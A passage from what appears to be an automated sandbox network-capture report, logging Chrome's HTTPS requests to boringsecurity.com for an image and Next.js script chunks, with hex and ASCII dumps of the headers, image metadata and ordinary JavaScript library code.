ed 16 a0 fd f4 9a 7e c2 83 ae 3c 7c fa 04 c9 97 74 e5 f4 5a af 4b bb ee 9a a6 2e 4c 4c 18 fa 36 0d
                                                                          Data Ascii: /Q&hlQXn6^sN5?)d LB|cm}C~B|9fi{*Ueua7r+7CP&(*UnJcs6^%aWjc2Q;vNkZQ[Zr\rld!Mo\4`6IcyQ~<|tZK.LL6


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          92192.168.2.54982575.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC358OUTGET /images/steel.jpg HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC396INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 35 30 39 32 34 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 68 69 74 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 32 37 31 30 32 34 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 69 6d 61 67 65 2f 6a 70 65 67 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20 22 63 61 39 37 63 30 31 31 33 38 61 34 35 39 62 37 38 38 64 31 38 34 34 64 39 65
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 50924Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; hitContent-Length: 271024Content-Type: image/jpegDate: Sun, 10 Dec 2023 16:44:50 GMTEtag: "ca97c01138a459b788d1844d9e
                                                                          2023-12-10 16:44:50 UTC790INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 28 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 37 2e 31 2d 63 30 30 30 20 37 39 2e 39 63 63 63 34 64 65 39 33 2c 20 32 30 32 32 2f 30 33 2f 31 34 2d 31 34 3a 30 37 3a 32 32 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46
                                                                          Data Ascii: ExifII*Ducky(http://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 7.1-c000 79.9ccc4de93, 2022/03/14-14:07:22 "> <rdf:RDF
                                                                          2023-12-10 16:44:50 UTC2372INData Raw: 36 2d 34 65 34 37 2d 39 34 30 31 2d 32 32 33 36 66 31 61 37 62 61 35 38 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 61 64 6f 62 65 3a 64 6f 63 69 64 3a 70 68 6f 74 6f 73 68 6f 70 3a 64 31 34 30 63 35 33 37 2d 65 65 35 30 2d 34 61 34 36 2d 62 33 34 65 2d 65 61 30 64 32 33 64 61 31 33 36 39 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e ff ee 00 21 41 64 6f 62 65 00 64 c0 00 00 00 01 03 00 10 03 03 06 09 00 01 15 94 00 01 58 04 00 04 22 ae ff db 00 84 00 0c 08 08 08 09 08 0c 09 09 0c 11 0b 0a 0b 11 15 0f 0c 0c 0f 15 18 13 13 15 13 13 18 17 12 14 14 14 14 12 17 17 1b 1c 1e 1c 1b 17 24 24 27 27
                                                                          Data Ascii: 6-4e47-9401-2236f1a7ba58" stRef:documentID="adobe:docid:photoshop:d140c537-ee50-4a46-b34e-ea0d23da1369"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>!AdobedX"$$''
                                                                          2023-12-10 16:44:50 UTC538INData Raw: 67 69 c8 25 80 26 4a 34 38 28 a2 1a 90 be 74 55 4a 3b 49 d0 31 70 05 e9 a2 aa 28 12 0b e9 cf a1 58 a2 36 c5 b3 46 b9 83 a7 2d d4 9e 92 95 16 15 af 89 5d 25 19 b9 0b 8c 74 8a 0a 30 75 63 1d fa 70 b2 89 c7 3e bc fa 14 75 e6 4e d8 9f 57 9b 1e 93 90 77 dc ba 8d 73 b3 68 0f 40 27 21 a3 a5 ea 2c c1 ab 95 17 9e 45 d4 e3 a3 29 d6 4c 4d 18 aa 28 52 81 30 54 c1 d3 b7 97 d0 43 30 77 dc e8 d1 7c cb 95 09 d8 d3 b1 78 ee 55 b4 79 f7 59 26 b9 85 11 d4 e6 75 e4 76 22 8d 84 a8 d2 33 60 f2 be 66 32 4c f5 e6 1a 52 d8 a0 da 47 4e 2f 9c 05 cf 3b 0e 93 26 2b 88 df 2e 82 89 ca 6a 4a d3 46 c4 1d 7c bb a9 14 63 4d 04 ee 9c 46 68 2b 9d c9 06 c3 1b 00 61 c6 2e fc fd 06 2b 81 b2 18 eb 07 32 a4 84 83 d0 72 0e 93 cf a1 b4 d9 cf 6e 67 59 71 cf 9d 86 e9 a8 04 00 0a 2a 03 6c 38 c6 a9 c7
                                                                          Data Ascii: gi%&J48(tUJ;I1p(X6F-]%t0ucp>uNWwsh@'!,E)LM(R0TC0w|xUyY&uv"3`f2LRGN/;&+.jJF|cMFh+a.+2rngYq*l8
                                                                          2023-12-10 16:44:50 UTC4744INData Raw: e5 ae 08 40 e9 8c 53 29 cf 97 6f 39 db 1d 03 9f 6e 04 dc 48 0c 0c 75 83 9d ca 1e 8e 74 6e 77 01 a7 19 9c 75 e7 d7 99 b6 93 4f 4e 60 b0 3b 02 54 8c 5c 8c de 27 54 85 32 14 c1 b8 f6 83 2a 21 44 45 49 43 cc da b1 32 c9 b3 8c e0 be 9c 68 76 c4 94 9c f5 62 0b c4 ea 83 54 25 46 90 bd 64 6a 0c 29 0e 03 21 ae 68 d9 93 6d 82 a6 8c 20 92 1d 1e 70 77 39 a5 61 16 41 8a c6 4a 2a 5a 0a 28 c6 4a 0b 24 b9 36 71 a3 a4 93 b4 9d 59 b3 18 14 43 56 0d b0 bc d2 aa 3b 1b 95 63 59 8b c2 02 04 d0 6e 9c 7d 04 e4 1b 8a 29 03 32 9d 77 3e 84 85 94 c8 74 ae 34 77 e5 72 6b e7 45 71 eb 03 7c fa 06 3a 9e 6b 84 ef 90 ed 5c a8 be 1d e4 8e fc 83 58 16 21 8a a2 7a 48 75 e5 da 0a ed c3 a1 71 49 0e 0b 0e 85 b3 44 6e 7c ce f3 72 4f 58 c7 7a e7 d0 cf 2e a6 10 eb db cd d8 a3 04 5f 3e 87 3e 9c ec
                                                                          Data Ascii: @S)o9nHutnwuON`;T\'T2*!DEIC2hvbT%Fdj)!hm pw9aAJ*Z(J$6qYCV;cYn})2w>t4wrkEq|:k\X!zHuqIDn|rOXz._>>
                                                                          2023-12-10 16:44:50 UTC5930INData Raw: 8d 35 01 71 d0 0c 09 34 03 8d 35 81 90 9a ac 02 91 ce c3 8f a6 50 c6 20 e9 cc 28 a3 5c a7 3e 88 49 50 4c dc 9a e2 ca 19 39 f6 89 28 d2 5a c9 a3 9c 15 d7 87 60 74 8c e4 9e 93 64 8a 24 e2 89 a3 66 4c 01 52 07 6e 78 07 62 cd 25 4e 41 31 4c 20 89 3a 82 73 06 4a 2f 45 93 a3 1d 27 24 59 45 c6 c2 a1 8e 90 43 38 bd 34 5e 9a 04 a3 0e 36 43 0a 46 a0 97 61 b0 14 4c 20 ce c5 5c e1 63 1b a7 3a 1a 84 a2 71 b6 83 ad 45 95 a6 4b d2 82 e2 2f 50 54 25 c5 49 5a 28 72 15 ae 0b 35 05 18 ad 09 d0 8c 37 09 5c d4 c5 51 15 93 0c 14 5e 1b 84 d1 d6 05 d8 d4 50 54 a6 35 11 74 85 c6 2e f9 d0 93 41 36 9c fb 96 41 b1 d0 90 bb e3 64 54 25 54 75 26 f5 1c 6d 03 3c 0a 66 8e d5 c7 a1 a7 88 7a b9 45 9c 7a eb 3b 47 2e 84 f4 94 63 bc 1c 58 0e fc e2 ce db 9d 98 42 f6 09 72 3c f2 41 72 41 52 55
                                                                          Data Ascii: 5q45P (\>IPL9(Z`td$fLRnxb%NA1L :sJ/E'$YEC84^6CFaL \c:qEK/PT%IZ(r57\Q^PT5t.A6AdT%Tu&m<fzEz;G.cXBr<ArARU
                                                                          2023-12-10 16:44:50 UTC7116INData Raw: 72 3c fa 49 0d 62 69 92 65 45 d8 dc ee 4e 7b 25 33 87 9d 49 b6 c1 99 37 5e 56 4d 4e 0c 83 a5 19 a9 2f 60 22 a8 e7 b6 1c 61 28 33 83 69 a0 66 8a c6 02 51 9c 0f 37 14 6a 31 38 ae 9c ac da 13 a4 80 f2 eb 26 4c 6c 86 c2 62 a4 b8 41 9a 90 b9 40 31 49 86 54 8c c9 5b 02 69 34 ea 1a 90 9a 31 d2 4b 26 76 36 41 d9 36 d8 97 61 c8 5c e0 8e b0 1d 23 a4 9a e2 8c 64 11 33 b1 52 84 f4 e7 8a 97 05 4a 56 11 c0 57 3a a2 5a c4 1d 43 6b 82 1b 0d 53 87 09 4c a5 28 61 09 c6 2a 6e 4e 90 07 44 93 a6 e4 97 5c e8 12 c4 b0 86 83 5f 2a 1c a7 23 a4 95 51 d0 4b 92 5c 15 0e 35 f3 a3 a1 ce cc a1 3b 60 a9 b2 67 d3 c0 ad ce 8b 0a 11 a3 93 40 88 49 52 74 66 0e d3 b9 9d 18 b2 3a 72 b2 b0 8d f1 c7 47 9d 1b 21 ba 71 ea 56 9e 84 73 c0 17 25 e4 36 c9 19 c6 b2 4e b8 83 9d 12 77 e5 76 73 e9 ce c4
                                                                          Data Ascii: r<IbieEN{%3I7^VMN/`"a(3ifQ7j18&LlbA@1IT[i41K&v6A6a\#d3RJVW:ZCkSL(a*nND\_*#QK\5;`g@IRtf:rG!qVs%6Nwvs
                                                                          2023-12-10 16:44:50 UTC8302INData Raw: 08 ce 04 28 04 36 d8 58 b2 68 4d 70 9b 18 32 84 b2 58 05 98 34 d6 36 d2 56 64 1d 8c 6c 38 4c 38 71 84 c9 cb 6c 64 4d b6 0c 85 02 0e c6 d9 0c 86 c6 2f 18 74 26 72 2c a6 2a 42 6e 4b a8 a1 35 06 40 32 38 92 f4 a3 2e 35 ca 39 40 70 2c 95 b4 1a 70 56 c1 aa 71 71 61 a8 4c a0 ed 8d 34 19 d8 61 43 68 2f a7 1e 86 29 04 a0 87 18 ac 0e 0a e7 da 0e 5d 50 6a 53 45 01 d2 12 a6 a4 d3 58 c2 8c 74 90 d6 11 d3 9d 17 84 95 c4 c5 74 38 5e 41 68 9c 86 a8 4d cf a6 21 84 b6 12 a5 0c 96 61 4d 8b 27 08 14 14 4d 11 65 01 a8 07 12 81 d2 b9 d0 ee 58 a6 6c 59 a3 64 39 73 ef cc bb e7 d0 db 63 17 24 86 29 99 2d 84 c1 44 75 e7 65 85 01 40 28 6d 82 60 c5 48 9b 68 3a f3 e8 1c fa ec 67 21 9c 13 d3 99 9c 15 15 89 cc 0f 5f 2f a0 0b c4 56 4d 15 01 a9 22 b0 69 e9 8e 5b a4 8a 50 4d 49 2c f5 1e
                                                                          Data Ascii: (6XhMp2X46Vdl8L8qldM/t&r,*BnK5@28.59@p,pVqqaL4aCh/)]PjSEXtt8^AhM!aM'MeXlYd9sc$)-Due@(m`Hh:g!_/VM"i[PMI,
                                                                          2023-12-10 16:44:50 UTC6118INData Raw: 8b ad 70 6a fe 87 bb 15 89 98 3e a5 e1 2e 96 a2 d5 b4 f5 36 d6 cd 7e 90 c4 ec 6f 54 27 97 56 db 2e c4 6c 9d d6 53 2f 1e 62 d2 b1 14 a2 cf f4 ff 00 fa 0b 5c 0b bb b8 46 45 a9 54 24 60 ee 30 53 10 b5 4c a1 35 1d ab 55 65 b3 2e 2f 0b b7 43 3c 9e cc de 4d 75 57 83 e4 f4 b2 d3 19 68 b3 e8 74 a3 b2 e9 27 66 db e7 df ad 96 cf 61 14 d2 d9 26 b4 d7 5d 07 0d aa 6d 24 6e 74 bf cd 59 b7 cf ce e6 cb 19 bf f3 d3 67 aa d5 a3 6d 76 4b f6 42 d9 96 5d 8d 6e 2d 4c 1d 3e c6 a1 37 1a a6 b6 4b 3b 6a c5 54 8b 4c 6e df 7b 3f e4 f7 4f 67 b3 d4 77 b6 c9 b3 03 79 c3 11 46 b4 7c e6 b3 b6 bb 23 64 a9 6a cb 7f 36 3a 2d 31 f4 bf 8a 62 1e 51 d1 62 a1 c5 50 d2 67 42 b3 56 32 8a 3d b1 cf ce 68 ac e2 19 89 c3 29 4a 3a 86 64 a1 0e 52 e2 e2 a5 a9 b5 50 d9 74 60 bb 9b ce ce a3 7b 4e e1 28 a5
                                                                          Data Ascii: pj>.6~oT'V.lS/b\FET$`0SL5Ue./C<MuWht'fa&]m$ntYgmvKB]n-L>7K;jTLn{?OgwyF|#dj6:-1bQbPgBV2=h)J:dRPt`{N(
                                                                          2023-12-10 16:44:50 UTC10674INData Raw: 59 93 0d dd 26 c4 d8 d8 ac 67 f6 d7 11 56 22 f2 f6 1b a3 e9 99 67 be 0d 31 42 d8 f5 45 3b 6a 16 11 83 67 81 d0 d3 8b a8 c1 a2 4a 3a 3b 30 5c 31 a2 a3 a2 8b 3b 17 ea de 5e 22 8a 2b 02 45 15 45 73 50 a9 8d 2f c4 f4 29 94 2c 42 65 c5 70 ed d0 cc 96 22 f8 7a 3f c3 83 d7 92 b8 b3 a1 d4 78 a8 b1 8b a3 d6 cd b6 75 4d 1f 7f ad b1 7f 24 dd d8 f2 78 87 4c 48 ca 3d ec fe 46 ae 1d 95 9c 8f a3 fa ac 18 ae c4 75 1f d8 ac 7c 23 f5 d4 fa 63 ef 2c 69 99 18 8d d3 5b 78 21 0f b7 93 07 ac 7f 34 da 7a cd 1d cf cd af 9d f5 d9 b3 b3 58 5b 52 f9 a1 24 35 1f 4d 0b 61 d3 1a 66 12 ea 3e 95 bd d9 a3 43 c1 a3 b5 ae 95 b6 0b a2 e8 79 1e b6 55 1d 46 db 1f 25 d1 93 e9 a2 ed fd 65 3b 4c 66 d5 49 aa f0 f3 25 64 a1 0e 86 d2 86 f1 5c 57 59 1b 55 42 bb ed da 19 aa ce dd ef 68 d7 1a ad f6 f9
                                                                          Data Ascii: Y&gV"g1BE;jgJ:;0\1;^"+EEsP/),Bep"z?xuM$xLH=Fu|#c,i[x!4zX[R$5Maf>CyUF%e;LfI%d\WYUBh


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          93192.168.2.54982675.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC563OUTGET /_next/static/chunks/59-d0e28623b64e6b96.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2023-12-10 16:44:50 UTC423INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 41 67 65 3a 20 30 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 75 62 6c 69 63 2c 6d 61 78 2d 61 67 65 3d 30 2c 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 22 4e 65 74 6c 69 66 79 20 45 64 67 65 22 3b 20 66 77 64 3d 6d 69 73 73 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 34 37 38 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 61 76 61 73 63 72 69 70 74 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 31 30 20 44 65 63 20 32 30 32 33 20 31 36 3a 34 34 3a 35 30 20 47 4d 54 0d 0a 45 74 61 67 3a 20
                                                                          Data Ascii: HTTP/1.1 200 OKAccept-Ranges: bytesAge: 0Cache-Control: public,max-age=0,must-revalidateCache-Status: "Netlify Edge"; fwd=missContent-Length: 15478Content-Type: application/javascript; charset=UTF-8Date: Sun, 10 Dec 2023 16:44:50 GMTEtag:
                                                                          2023-12-10 16:44:50 UTC763INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 35 39 5d 2c 7b 32 36 31 34 35 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 72 2e 64 28 74 2c 7b 4f 24 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 45 7d 7d 29 3b 76 61 72 20 6e 3d 72 28 33 39 30 39 38 29 2c 6f 3d 72 2e 6e 28 6e 29 2c 69 3d 72 28 33 39 34 30 34 29 2c 73 3d 72 28 36 35 36 33 31 29 2c 75 3d 6f 28 29 2e 42 4e 3b 6c 65 74 20 6c 3d 6e 65 77 20 73 2e 59 64 28 22 62 69 67 6e 75 6d 62 65 72 2f 35 2e 37 2e 30 22 29 2c 61 3d 7b 7d 2c 63 3d 21 31 3b 63 6c 61 73 73 20 45 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 2c 74 29 7b 65
                                                                          Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[59],{26145:function(e,t,r){r.d(t,{O$:function(){return E}});var n=r(39098),o=r.n(n),i=r(39404),s=r(65631),u=o().BN;let l=new s.Yd("bignumber/5.7.0"),a={},c=!1;class E{constructor(e,t){e
                                                                          2023-12-10 16:44:50 UTC2372INData Raw: 65 74 75 72 6e 20 67 28 68 28 74 68 69 73 29 2e 6d 75 6c 28 68 28 65 29 29 29 7d 6d 6f 64 28 65 29 7b 6c 65 74 20 74 3d 68 28 65 29 3b 72 65 74 75 72 6e 20 74 2e 69 73 4e 65 67 28 29 26 26 4e 28 22 64 69 76 69 73 69 6f 6e 2d 62 79 2d 7a 65 72 6f 22 2c 22 6d 6f 64 22 29 2c 67 28 68 28 74 68 69 73 29 2e 75 6d 6f 64 28 74 29 29 7d 70 6f 77 28 65 29 7b 6c 65 74 20 74 3d 68 28 65 29 3b 72 65 74 75 72 6e 20 74 2e 69 73 4e 65 67 28 29 26 26 4e 28 22 6e 65 67 61 74 69 76 65 2d 70 6f 77 65 72 22 2c 22 70 6f 77 22 29 2c 67 28 68 28 74 68 69 73 29 2e 70 6f 77 28 74 29 29 7d 61 6e 64 28 65 29 7b 6c 65 74 20 74 3d 68 28 65 29 3b 72 65 74 75 72 6e 28 74 68 69 73 2e 69 73 4e 65 67 61 74 69 76 65 28 29 7c 7c 74 2e 69 73 4e 65 67 28 29 29 26 26 4e 28 22 75 6e 62 6f 75 6e
                                                                          Data Ascii: eturn g(h(this).mul(h(e)))}mod(e){let t=h(e);return t.isNeg()&&N("division-by-zero","mod"),g(h(this).umod(t))}pow(e){let t=h(e);return t.isNeg()&&N("negative-power","pow"),g(h(this).pow(t))}and(e){let t=h(e);return(this.isNegative()||t.isNeg())&&N("unboun
                                                                          2023-12-10 16:44:50 UTC538INData Raw: 65 2e 74 79 70 65 26 26 28 74 3d 65 2e 68 65 78 29 2c 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 28 30 2c 69 2e 41 37 29 28 74 29 7c 7c 22 2d 22 3d 3d 3d 74 5b 30 5d 26 26 28 30 2c 69 2e 41 37 29 28 74 2e 73 75 62 73 74 72 69 6e 67 28 31 29 29 29 29 72 65 74 75 72 6e 20 45 2e 66 72 6f 6d 28 74 29 7d 7d 72 65 74 75 72 6e 20 6c 2e 74 68 72 6f 77 41 72 67 75 6d 65 6e 74 45 72 72 6f 72 28 22 69 6e 76 61 6c 69 64 20 42 69 67 4e 75 6d 62 65 72 20 76 61 6c 75 65 22 2c 22 76 61 6c 75 65 22 2c 65 29 7d 73 74 61 74 69 63 20 69 73 42 69 67 4e 75 6d 62 65 72 28 65 29 7b 72 65 74 75 72 6e 21 21 28 65 26 26 65 2e 5f 69 73 42 69 67 4e 75 6d 62 65 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65
                                                                          Data Ascii: e.type&&(t=e.hex),"string"==typeof t&&((0,i.A7)(t)||"-"===t[0]&&(0,i.A7)(t.substring(1))))return E.from(t)}}return l.throwArgumentError("invalid BigNumber value","value",e)}static isBigNumber(e){return!!(e&&e._isBigNumber)}}function f(e){if("string"!=type
                                                                          2023-12-10 16:44:50 UTC4744INData Raw: 72 69 6e 67 28 30 2c 34 29 3b 29 65 3d 22 30 78 22 2b 65 2e 73 75 62 73 74 72 69 6e 67 28 34 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 67 28 65 29 7b 72 65 74 75 72 6e 20 45 2e 66 72 6f 6d 28 66 28 65 29 29 7d 66 75 6e 63 74 69 6f 6e 20 68 28 65 29 7b 6c 65 74 20 74 3d 45 2e 66 72 6f 6d 28 65 29 2e 74 6f 48 65 78 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 22 2d 22 3d 3d 3d 74 5b 30 5d 3f 6e 65 77 20 75 28 22 2d 22 2b 74 2e 73 75 62 73 74 72 69 6e 67 28 33 29 2c 31 36 29 3a 6e 65 77 20 75 28 74 2e 73 75 62 73 74 72 69 6e 67 28 32 29 2c 31 36 29 7d 66 75 6e 63 74 69 6f 6e 20 4e 28 65 2c 74 2c 72 29 7b 6c 65 74 20 6e 3d 7b 66 61 75 6c 74 3a 65 2c 6f 70 65 72 61 74 69 6f 6e 3a 74 7d 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 72 26 26 28 6e
                                                                          Data Ascii: ring(0,4);)e="0x"+e.substring(4);return e}function g(e){return E.from(f(e))}function h(e){let t=E.from(e).toHexString();return"-"===t[0]?new u("-"+t.substring(3),16):new u(t.substring(2),16)}function N(e,t,r){let n={fault:e,operation:t};return null!=r&&(n
                                                                          2023-12-10 16:44:51 UTC5930INData Raw: 29 7b 65 7c 7c 74 68 69 73 2e 74 68 72 6f 77 45 72 72 6f 72 28 74 2c 72 2c 6e 29 7d 61 73 73 65 72 74 41 72 67 75 6d 65 6e 74 28 65 2c 74 2c 72 2c 6e 29 7b 65 7c 7c 74 68 69 73 2e 74 68 72 6f 77 41 72 67 75 6d 65 6e 74 45 72 72 6f 72 28 74 2c 72 2c 6e 29 7d 63 68 65 63 6b 4e 6f 72 6d 61 6c 69 7a 65 28 65 29 7b 6e 75 6c 6c 3d 3d 65 26 26 28 65 3d 22 70 6c 61 74 66 6f 72 6d 20 6d 69 73 73 69 6e 67 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 6f 72 6d 61 6c 69 7a 65 22 29 2c 66 26 26 74 68 69 73 2e 74 68 72 6f 77 45 72 72 6f 72 28 22 70 6c 61 74 66 6f 72 6d 20 6d 69 73 73 69 6e 67 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 6e 6f 72 6d 61 6c 69 7a 65 22 2c 68 2e 65 72 72 6f 72 73 2e 55 4e 53 55 50 50 4f 52 54 45 44 5f 4f 50 45 52 41 54
                                                                          Data Ascii: ){e||this.throwError(t,r,n)}assertArgument(e,t,r,n){e||this.throwArgumentError(t,r,n)}checkNormalize(e){null==e&&(e="platform missing String.prototype.normalize"),f&&this.throwError("platform missing String.prototype.normalize",h.errors.UNSUPPORTED_OPERAT
                                                                          2023-12-10 16:44:51 UTC1131INData Raw: 29 28 28 29 3d 3e 7b 72 7c 7c 21 74 2e 63 75 72 72 65 6e 74 7c 7c 74 2e 63 75 72 72 65 6e 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 42 75 74 74 6f 6e 45 6c 65 6d 65 6e 74 26 26 21 74 2e 63 75 72 72 65 6e 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 29 26 26 6e 28 22 62 75 74 74 6f 6e 22 29 7d 2c 5b 72 2c 74 5d 29 2c 72 7d 28 65 2c 73 29 2c 52 3d 69 3f 7b 72 65 66 3a 6c 2c 74 79 70 65 3a 70 2c 6f 6e 4b 65 79 44 6f 77 6e 3a 66 2c 6f 6e 43 6c 69 63 6b 3a 68 7d 3a 7b 72 65 66 3a 6c 2c 69 64 3a 72 2e 62 75 74 74 6f 6e 49 64 2c 74 79 70 65 3a 70 2c 22 61 72 69 61 2d 65 78 70 61 6e 64 65 64 22 3a 65 2e 64 69 73 61 62 6c 65 64 3f 76 6f 69 64 20 30 3a 30 3d 3d 3d 72 2e 64 69 73 63 6c 6f 73 75 72 65 53 74 61 74 65 2c 22 61 72 69 61 2d 63
                                                                          Data Ascii: )(()=>{r||!t.current||t.current instanceof HTMLButtonElement&&!t.current.hasAttribute("type")&&n("button")},[r,t]),r}(e,s),R=i?{ref:l,type:p,onKeyDown:f,onClick:h}:{ref:l,id:r.buttonId,type:p,"aria-expanded":e.disabled?void 0:0===r.disclosureState,"aria-c


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          94192.168.2.54982775.2.60.54435756C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2023-12-10 16:44:50 UTC564OUTGET /_next/static/chunks/196-de1449618af62cf8.js HTTP/1.1
                                                                          Host: boringsecurity.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://boringsecurity.com/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
